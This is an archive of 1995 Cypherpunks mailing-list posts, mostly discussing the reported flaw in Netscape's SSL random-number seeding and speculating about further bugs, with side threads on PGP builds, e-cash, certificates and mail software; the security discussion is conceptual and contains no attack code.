   share an interest in the arcane science of cryptography,
   which is becoming increasingly important for business as
   companies begin to explore electronic commerce.

   The two students said they had decided to put the software
   to a test in an effort to raise public concern about
   placing too much trust in unproved electronic security
   systems.

   Netscape's security is based on a type of coding technology
   known generically as public key cryptography in which users
   exchange mathematically generated numbers -- or keys -- to
   encode or decode information. In such systems, a new key is
   created for each information exchange, based on a
   mathematical formula that is combined with numbers
   supposedly known only to the sender or recipient.

   The students found that by determining how Netscape's
   formula generated the number used as a starting point for
   creating a key, they were able to greatly reduce the
   potential combinations that would unlock the code. The
   starting-point number turned out to be based on the time
   and date of the transaction, combined with several other
   unique bits of information taken from a user's computer
   system -- bits of information that an electronic intruder
   could determine, if he were intent on intercepting a
   Netscape user's transactions.

   Knowing how the starting-point number was created greatly
   reduced the other possible components of the formula -- and
   the students found they were able to break the code in a
   matter of seconds using a standard computer work station.

   Netscape officials said today that they would strengthen
   the system, by making it significantly harder to determine
   the random number at the heart of their coding system. They
   said they would no longer disclose what data would be used
   to generate the random numbers.

   The announcement of the flaw was posted Sunday night on a
   computer network mailing list maintained by an informal
   group known as Cypherpunks. The group, which is made up of
   mathematicians, computer experts and privacy advocates, has
   been campaigning for more effective electronic security
   systems.

   The discovery is the second reported security weakness in
   the Netscape program to be posted on the Cypherpunks list
   in the last month. In August, Damien Doligez, a student at
   the Ecole Polytechnique in Paris, used a network of 120
   computers, running for eight days, to generate a Netscape
   secret key. But his was a "brute force" attack, requiring
   the computers to sample a vast range of numbers before
   coming up with a key that would break the code.

   The Berkeley students, in contrast, by identifying a basic
   flaw in the way Netscape set up its security system, were
   able to narrowly focus their attack to quickly break the
   code, with far less computer power.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 20:55:59 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <199509190355.XAA01329@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Markoff's article in the Times says:
>    Netscape officials said today that they would strengthen
>    the system, by making it significantly harder to determine
>    the random number at the heart of their coding system. They
>    said they would no longer disclose what data would be used
>    to generate the random numbers.

Not, of course, that they disclosed it before -- it was found by
reverse engineering the distributed executable. Not, of course, that
they have a choice in the matter of whether to disclose it -- they
will be "disclosing" how its done as soon as they release the
code. Not, of course, that security through obscurity does any good --
it just magnifies the pain.

I suspect that there are far more flaws in Netscape. String buffer
overflows are another good guess here -- they are probably rampant
through the code both for the browser and the commerce server they
sell. I can't prove it myself, of course, given that I don't have the
time to rip the thing apart, but the same folks never seemed to learn
their lesson in release after release when they worked at NCSA, and
the only thing thats probably keeping their dignity here is the lack
of distributed source code.

I'll pay for the "I broke Netscape's Security" T-Shirt for the
enterprising person that takes the time to find them in the object
code. (See Sameer's page on the shirts he's developing as prizes for
the Netscape flaw finders.)

Two "I broke Netscape's Security" T-Shirts to that daring soul at
Netscape who finds the next flaw and has the balls to mention it in
public instead of sweeping it under the carpet -- even if the person
is Marc Andreessen.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 18 Sep 95 21:08:22 PDT
To: vince@offshore.com.ai
Subject: Re: Hurricane Luis in Anguilla / Cellphone Antenna
In-Reply-To: <v02120d00ac83e18d8f6f@[199.0.65.105]>
Message-ID: <Pine.SOL.3.91.950918235250.23093A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Assuming your cellphone operates in the 800 MHz range, transmitting with 
about 1 W., I think you're out of luck.

With UHF and particularly at low power levels, you just about have to be 
line-of-sight to the receiving antenna. Guessing how high up your antenna 
might be and how high the receiving antenna could be, I would say you 
would be lucky to achieve a range of 20 miles.  I'd be astonished at 
anything over 50.

Brad

On Mon, 18 Sep 1995, Robert Hettinga wrote:

> 
> --- begin forwarded text
> 
> Date: Mon, 18 Sep 1995 13:24:33 +24000
> From: Vincent Cate <vince@offshore.com.ai>
> Subject: Hurricane Luis in Anguilla / Cellphone Antenna
> To: Steve Roberts <wordy@qualcomm.com>
> cc: Technomads <technomads@UCSD.EDU>
> MIME-Version: 1.0
> 
> 
> 
> Hurricane Luis took Anguilla apart.  The three utility polls right near my
> house all blew down.  My house, computers, etc are all fine.
> 
> Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems
> there were many people killed.  They have a lot of poor people there
> and also a lot of people used to live in boats.  More than 1,000 of
> about  1,400 boats sank.
> 
> They eye went right over Anguilla.  For awhile it was calm enough that
> everyone went outside to stretch and say hi to everyone.  Overall it
> took about 4 days to pass.
> 
> It has been nice to have solar pannels, batteries, an interter, etc. I did
> not have a cellphone, but I do now.
> 
> And now that I have one I am really interested in the directional antenna
> that might let me reach other islands - in particular the US Virgin
> islands where long distance rates are $0.10/min at night with sprint
> instead of the $2/min that we pay here in Anguilla.  Does anyone know
> where I can order a directional cellphone antenna (boat antenna) good for
> 100 miles?
> 
>   --  Vince
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
> USA (617) 323-7923
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com> (by way of carolann@censored.org (Censored Girls Anonymous))
Date: Mon, 18 Sep 95 22:03:04 PDT
To: cypherpunks@toad.com
Subject: FC's Opus
Message-ID: <199509190502.WAA01521@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Radio is blaring it out on KFAN and ABC RADIO now.

What if all it is,
is
a Detweiler tentacle?
hahahaha

Love Always,

Carol Anne.....coming to DC and NYC soon


The NY Times reports in tomorrow's paper that it and The 
Washington Post are publishing the Unabomber's 35,000-word 
manifesto as a separate pullout in The Washington Post 
tomorrow, as advised by AG Reno and FBI Director Freeh.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 18 Sep 95 21:04:57 PDT
To: cypherpunks@toad.com
Subject: Brute Force and Smart Force
Message-ID: <199509190405.AAA03711@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	I think its worth pointing out that instead of taking (arguably) $10,000 
worth of computer time to brute force SSL, Goldberg-Wagner's attack exploits a 
weakness in the system to spend maybe a few dollars to crack it.

	Clever attacks on cryptosystems like this are the bread and butter of 
'practical' cryptanalysis.  It might take until slightly after the heat death 
of the universe to break IDEA or your 2048 bit RSA key, but there exist other 
attacks, and they are the ones which will be exploited.

	(Also, as Robert Morris pointed otut, never underestimate the time, money or 
effort your opponent will put into cryptanalysis.  Cypherpunks, collectively, 
have put a great deal of time, effort, and CPU into proving SSL bogus, and I 
don't think anyone here made any money doing it.)

	Perhaps we should refocus our efforts on attacking PGP, to see if there are 
holes there?  (I'm not suggesting there are, but it would be nice to see some 
code written to extend Crack to phrases, do some more code review, etc.)

Adam

-- 

"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 18 Sep 95 21:11:00 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <199509190224.WAA03110@toxicwaste.media.mit.edu>
Message-ID: <Pine.SUN.3.91.950919000335.1167A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Derek Atkins wrote:

> Hi.  PGP 2.6.2 compiles out-of-the-box on Linux.  In fact, Linux is my
> personal development platform at home, so I make sure that it works.
> Just "make" in rsaref/install/unix, and then "make linux" in src.

Heh.  It's not QUITE so simple.  :)

If you're running an ELF system, you have to pretend it's a sys v system 
(or, alternatively, remove all the leading underscores in the .globl 
names in the assembly language (*.S) files.

Also, you should upgrade to the latest 1.2.x version of linux, as there 
was a fairly large memory leak until 1.2.11 or 1.2.12 or so...

OBCrypto: UNIX confuses me :)
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 00:18:35 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190703.DAA03247@clark.net>
Message-ID: <199509190713.AAA01128@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   I doubt this in the case of the browser. Atleast as far as the
> parsing is concerned. There may be a buffer overflow for example,

	Buffer overflow seems like a much greater concern when dealing
with a server. Particularly one which is supposedly "secure", and
accessing "secured" documents. Even with the server running as
'nobody' if someone can implement buffer overflow to get access to
documents they shouldn't then that would count as a pretty significant
hack.

	I suspect that the server is where the majority of the bugs
lie. My Hack Netscape page emphasizes the server as a place to look
for holes.


> when you input the url in the "open" window, but that has to be
> done manually by the user and isn't a threat, like a "rogue homepage"
> would be. The reason I doubt string buffer overflows in the case of
> the browser is that it seems to be written in some object oriented
> language, perhaps C++ (or maybe just oo-C like BSAFE). Once you
> have a general robust String class, you can prove it's non-overflowable,
> and therefore no composition of operations from the browser code will
> overflow it (unless of course, you break language safety by using
> casts and pointer manipulation) Secondly, Netscape has been very
> robust in my own testing against these common bugs. One of the things
> I've done lately is "tiger team" attacks against servers and browsers.
> (of course, sendmail is a brilliant counter example)
> (if you can find a call to gets() in Netscape, I will instantly 
> retreat ;-) )
> 
>   Netscape's security maybe bad, but the rest of their browser, or atleast
> their development process, is good engineering. They've built a very
> complex application, fairly quickly, that runs with very few bugs,
> across a wide variety of operating systems and GUI's, while maintaining
> a consistent user interface and feature set. Netscape 2.0 incorporated
> Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't
> expecting a Java capable Netscape until atleast December). I'd like to
> see Microsoft develop a piece of code that quickly that runs on
> umteen different flabors of Unix, MacOS, and Win3.1/95/NT. Hell, they
> can't even write code that runs smoothly across all three
> flavors of their operating system.
> 
> -Ray
> 
> 
>  
>    
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 18 Sep 95 21:15:19 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950919001218.15297A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, John Young wrote:

>    The New York Times, September 19, 1995, pp. A1, D21.
> 
> 
>    Security Flaw Is Discovered In Software Used in Shopping
> 
>    By John Markoff
> 
>    Today, as word of the security flaw circulated only within
>    fairly small circles of Internet users, Netscape's stock
>    closed with a slight loss, down 75 cents, to $52.50, in low
>    Nasdaq trading volume.

Gotta like that open sell order.  :)

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Sep 95 21:20:46 PDT
To: cypherpunks@toad.com
Subject: FC's Opus
Message-ID: <199509190420.AAA16227@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NY Times reports in tomorrow's paper that it and The 
Washington Post are publishing the Unabomber's 35,000-word 
manifesto as a separate pullout in The Washington Post 
tomorrow, as advised by AG Reno and FBI Director Freeh.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 18 Sep 95 21:20:38 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <Pine.SUN.3.91.950919002101.15456A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



I've been having mail problems of late.

Did you get my letter on your tax issue?


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 21:25:03 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Brute Force and Smart Force
In-Reply-To: <199509190405.AAA03711@homeport.org>
Message-ID: <199509190424.AAA01393@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	Perhaps we should refocus our efforts on attacking PGP, to see
> if there are holes there?  (I'm not suggesting there are, but it
> would be nice to see some code written to extend Crack to phrases,
> do some more code review, etc.)

Probably a worthwhile enterprise. Unfortunately, Netscape and the like
are low hanging fruit -- its much simpler to find holes in things, er,
of that, er, ah, quality -- and one probably rightfully gets more
press for breaking them.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 21:28:11 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <Pine.SUN.3.91.950919002101.15456A-100000@polaris.mindport.net>
Message-ID: <199509190427.AAA01402@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> I've been having mail problems of late.
> Did you get my letter on your tax issue?

Yes, but I've been preoccupied by the latest internet political
scandal over domain registration. Thank you greatly for the
information; I'll probably ask you a question or two within a few
days when my mail volume goes below 500 a day again.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 21:28:51 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <Pine.SUN.3.91.950919002101.15456A-100000@polaris.mindport.net>
Message-ID: <199509190428.AAA01410@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eek. Lovely accident. Never reply to "all" without checking the "to"
list. Sigh.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Mon, 18 Sep 95 21:32:59 PDT
To: cypherpunks@toad.com
Subject: taxonomies of 'real money' and e-cash
In-Reply-To: <Pine.3.89.9509161138.G23340-0100000@wane3.scri.fsu.edu>
Message-ID: <Pine.3.89.9509190028.C29056-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On the 15th of September, Tim May wrote -

. . .

> "Digital money" currently has only a few ways of dealing with transfers of
> value in transactions. A lot of the problems come, in my view, from this
> relatively spartan set of "primitives."
> 
> Where are the cryptographic equivalents of:
> 
> - money orders
> 
> - promissary notes
> 
> - receipts
> 
> - warrants
> 
> - lockboxes
> 
> - bearer bonds
> 
> - options
> 
> - time deposits
> 
> - coupons
> 
> - escrow
> 
> - IOUs
> 
> - zero coupon bonds
> 
> - checks
> 
> ...and so on. The terms in any good dictionary of financial terms (such as
> the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992). (Many
> of these things are built up out of more basic things, with mix-ins from
> other classses, or with modified methods.)
> 
> A look at any book on money and finance shows a rich "microworld" of
> "things" and "procedures" (classes and methods attached to classes). The
> classes have subclasses, and the methods have various behaviors and
> "expectations" attached (more than just simple class behavior, more of an
> AI or agent flavor, in my view).
> 

. . . .

> 
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
 Maybe I'm missing the larger point, but isn't it accurate that in the 
digital world, one protocol or procedure may take the place of perhaps 
several of the 'real-world' procedures or protocols?  An effective 
mechanism of signing with non-repudiation that was recognized as binding 
on the signer would permit 'checks', 'promissory notes', 'IOUs', and 
'warrants'.  Some of the other species listed in your post aren't really 
money, anyway.  They are things you can buy with money, like stock 
certificates or Maseratis.  One could conceivably buy convertible 
debentures with e-cash, the same as one could buy them with 'real money', 
but it doesn't follow that there should be some one-to-one mapping of real 
money objects and classes onto electronic analogues.  Once again, i've 
probably missed the forest, but a couple of the trees distracted me.

--PJ Ponder




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 00:53:18 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190734.DAA09824@clark.net>
Message-ID: <199509190748.AAA03614@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> http://www.isp.com/company1/passwd   contains the passwd file for the
> http://www.isp.com/company1/   URL directory. Although it is convenient
> to store the passwd file within the hierarchy it is protecting, care
> must be taken to make it unreadable by normal HTTP requests. It's better 
> to put it in a configuration directory somewhere where no server
> has access to. (I've seen this mistake plenty of times)

	The server process itself still needs access to that file
though in order to verify passwords, so it can't be totally
protected-- a bug in the server might reveal the password file. A
relatively minor point..

> 
>   A barebone's web server is a pretty simple piece of a software compared
> to a browser (or sendmail), so it should be possible to make them
> much more secure.

	Right. The Netscape Commerce server, on the other hand, is by
no means a barebones webserver. It has a full-featured API which
allows dynamic loading of custom-written modules to handle every
aspect of web servering. Its configurations files, while not as
complex as sendmail config files, are rather complex. The server comes
with an "GUI administration tool", which allows you to configure the
server using netscape over HTTP to a special server, -running as
root-, which can modify configuration files, restart the server,
etc. (I am not sure if the administration server -must- run as root,
but that is how it has been configured in the installations I have
seen.)
	Even extremely good security programmers could probably not
write such a complex program without bugs, particularly on the
timescale for which you have commended Netscape. (Extremely good
ethical security programmers may not even be -willing- to write such a
complex program and declare it secure)
	There is actually an interesting parallel to sendmail in
webservers..webservers have a very vital 'rewriting' phase, where they
turn the url (/~sameer for example) into a filename
(/u1/sameer/public_html/index.phtml) This phase is where it checks
ownership, checks symlinks, etc. I figure that section may be rife
with holes, given the incredibly powerful rewriting that the highly
flexible servers can do these days.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 18 Sep 95 22:50:26 PDT
To: shields@tembel.org (Michael Shields)
Subject: Re: PGP for Linux 1.2.8
Message-ID: <199509190604.BAA10003@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:39 AM 9/19/95 +0000, you "wrote":
>Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
>

I, for one, don't need Mystery MIME Attachments cluttering up my drive. If
it's worth saying, then *say* it.

Thank you.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF49HsVrTvyYOzAZAQE9aQP+JYa+eglyQCWWHxt5AexhapWyURziXX31
UN97I287MtJw62us1Usr3rpgSbm/7C1LaIZP4ucY0rEXXfvSRzbOPnaa0nPb18e/
Axf/5RzjsrgjvHiXsXm8e2/7z6fe+dByA6qSKLaE77yOkKNEoEPbUeJrjzX7PKSR
qLFotWpaYvs=
=VGzR
-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 19 Sep 95 01:19:55 PDT
To: perry@piermont.com
Subject: Re: Brute Force and Smart Force
In-Reply-To: <199509190424.AAA01393@frankenstein.piermont.com>
Message-ID: <199509190819.BAA15784@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Adam Shostack writes:
| > 	Perhaps we should refocus our efforts on attacking PGP, to see
| > if there are holes there?  (I'm not suggesting there are, but it
| > would be nice to see some code written to extend Crack to phrases,
| > do some more code review, etc.)
| 
| Probably a worthwhile enterprise. Unfortunately, Netscape and the like
| are low hanging fruit -- its much simpler to find holes in things, er,
| of that, er, ah, quality -- and one probably rightfully gets more
| press for breaking them.

What I don't understand is why the law-enforcement is so concerned 
about bruting things. It is probably quite easy to tap the keyboard,
smart force, exchange the binary with the real thing etc for them?

(Unless they want to read it all from a nice tipped-back armchair in
a certain location? :-))

What I'm saying is that this kind of attack should work quite easily
in the one-by-one cases, but not on a large scale, malicious data,
trojan horses, outright bugging. So why all this Clipper (son-of-X)
fuss? 

Ok, not for all data, especially not for the "untouched, rarely used"
ones. But is this any different from hiding your diary in a very safe
place anyway?

/Christian







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Mon, 18 Sep 95 22:47:48 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Caribbean Internet Services?
In-Reply-To: <ac835f9008021004ec69@[205.199.118.202]>
Message-ID: <199509190524.BAA00324@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> ObCypherpunks Relevance: A couple of past or current list members have
> nascent Internet plans in some of these islands. (I think one of them is
> way south, just off Venezuela.)
 
> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> they were a few months ago.
> 
> --Tim May

I'm not as familiar w/ the VI's as other parts of the Carib, but I can
say that Curacao is no St. Thomas. It's got real buildings, high ground
and substational infrastructure.  You want primative, try Guyana.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 19 Sep 95 02:21:51 PDT
To: cypherpunks@toad.com
Subject: Re: VeriSign Introduces the First Digital ID Issuing Service
In-Reply-To: <9509181742.aa29912@ncrhub1.ATTGIS.COM>
Message-ID: <950919.012810.3g2.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, Chris.Claborne@SanDiegoCA.ATTGIS.COM quotes
a VeriSign press release:

> Class One Digital IDs: These IDs insure the uniqueness of a name or
> e-mail address. Class One Digital IDs are primarily used for casual
> World Wide Web browsing and secure e-mail. VeriSign offers
> non-commercial Class One Digital IDs at no cost or VeriSign supported
> commercial versions for $6.

> Netscape Navigator 2.0 users will be able to download Class One Digital
> IDs from VeriSign's new Online Digital ID Issuing Service on the World
> Wide Web beginning in late October.

I can forsee some possible DOS attacks against the Class One
certificate.  (p'raps I should get mine forthwith?)  And what
protection is VeriSign offering against the misuse of our certificates
(given that VeriSign must undoubtedly hold copies of all the issued
certs).
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
  perl -e '$x = 1/20; print "Just my \$$x! (adjusted for inflation)\n"'
        "What do you mean, you've never been to Alpha Centauri?"
                                               -- Prostetnic Vogon Jeltz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF5kXBvikii9febJAQFu6QQAmA46r+MuUOprM/ETHPnzKVYWuc8vT22i
xqzgV5ScNLPe2fjSBlWtazT+e1xbj6MQKzHfqJUZztvRfpD4U3h7xptuf5WjRhlt
liHgrLvg9Nkq4azfQkS71ifW2cM4uZZpF0BrQsNxEsN5WiiYkBGFQCN8eRZ17s3i
GnU/FjZbiGc=
=o0wf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:09 PDT
To: Rick.Sciorra@hudson.lm.com
Subject: Re: Automatic E-Mail
Message-ID: <199509190929.CAA23985@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[This isn't quite on topic, though you could stretch it to
deal with remailers.  Can the winsock remailer do this?]

At 10:50 PM 9/18/95 GMT, Rick.Sciorra@hudson.lm.com wrote:
>Does anyone know of an E-Mail package that will automatically connect
>to the Internet and retreive mail at specific intervals?

Sigh.  Folks have gotten too used to PC-market email systems,
which are generally braindamaged by having been around operating
systems where you can't just run a listner program that waits
for somebody to call you when they want to send you mail,
which of course fits in very well with letting ISPs avoid
having to make outgoing phone calls instead of just receiving,
plus the market reluctance of many of them to forward mail for you
to competing mail services and the client/server-orientation
that makes peer-to-peer services harder to implement.

Unix systems did this job just fine on PDP11/70s, which could
support a dozen or two users on a machine with about the
horsepower of a PC/AT.  And Henry Spencer could do that on a /44 :-)

Just about anything that does UUCP can be set to do that,
if you've got an ISP who doesn't charge you lots extra for
using UUCP.  Most high-end terminal emulation packages
have scripting languages that let you call up and do stuff,
which you should be able to call from timer programs;
you can probably even find a free Kermit version that will
do it.

I use Eudora Light with Trumpet to call Netcom's newbie-friendly
Netcruiser service; when I hit the menu item for send or retrieve
mail, it pops through all the layers and dials, and hangs up when it's done.
If Commercial Eudora can't already do that automagically, it should - 
ask Qualcomm to add it to the next version...  Alternatively, Winsock
programming isn't really all that hard, and POP3 is a pretty simple
protocol, so you could roll your own.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:11 PDT
To: cypherpunks@toad.com
Subject: Re: MIME attachments and ranting.
Message-ID: <199509190929.CAA23989@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>> >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
>> I, for one, don't need Mystery MIME Attachments cluttering up my drive. If
>> it's worth saying, then *say* it.
>I really don't know why any mailers call a monopart MIME message an
>"attachment".

Mail readers come in three basic flavors of unMIMEificationness:
1) Ignorance+bliss - the mailer doesn't know or care about MIME headers,
   and you can ignore them when you read them, and may be able to configure
   the reader not to bother you with most of them (e.g. BSD Mail.)
3) Intelligence - the mailer does something genuinely useful to help you
   read the attachment, like letting you pop up some appropriate reading tool.
2) Naive friendliness - the Sirius Cybernetics approach.  "Your mail file has
   been tastefully shredded into little pieces and sprinkled around your
disk drive.
   Thank you for making a humble mail system so _very_ happy."  Free Eudora
versions
   offer you several choices of tastefulness and shredditude, partly
intended to 
   provide artistic functionality and partly to encourage you to buy the
commercial
   version which gives you a more flexible user interface for extensions
like MIME.
   So buy it, or cope with it, or tell Eudora to use your RAMdisk for its
attachments
   where they'll soon go away and not bother you.

There's also another approach, typified by a vendor whose name will be omitted
but they'd know who they were if they had a <perjorative deleted> clue....

0) Downright hostile - Not only does it _pretend_ to be Intelligent, while
   only really doing the right thing with its own proprietary data formats*,
   though generally doing something reasonable with uuencoded documents with
   names that it understands, but it chokes and dies on messages that have
   even moderately large amounts of simple, basic, non-attachmentized _text_,
   and if you _do_ try to package text up to send to some poor sucker who's
   stuck with one of these <perjorative deleted> systems, it hands it to a 
   brain-damaged user-friendly mouse-editor that _also_ chokes on more than
   64KB of text....

[* where "the right thing" allows it to mindlessly run arbitrary code handed
to it as macros in the proprietary data formats that the company encourages its
users to use instead of real text....]

   
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:11 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <199509190929.CAA23992@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   The New York Times, September 19, 1995, pp. A1, D21.
> ......
>   "The good news and the bad news of the Internet is that
>   when you put something up there, many more people can test
>   it," said Mike Homer, the vice president of marketing at
>   Netscape. "You also give yourself the opportunity of having
>   people point things out which you can fix quickly."

That's a good, and realistic, attitude.

>   Netscape officials said today that they would strengthen
>   the system, by making it significantly harder to determine
>   the random number at the heart of their coding system. They
>   said they would no longer disclose what data would be used
>   to generate the random numbers.

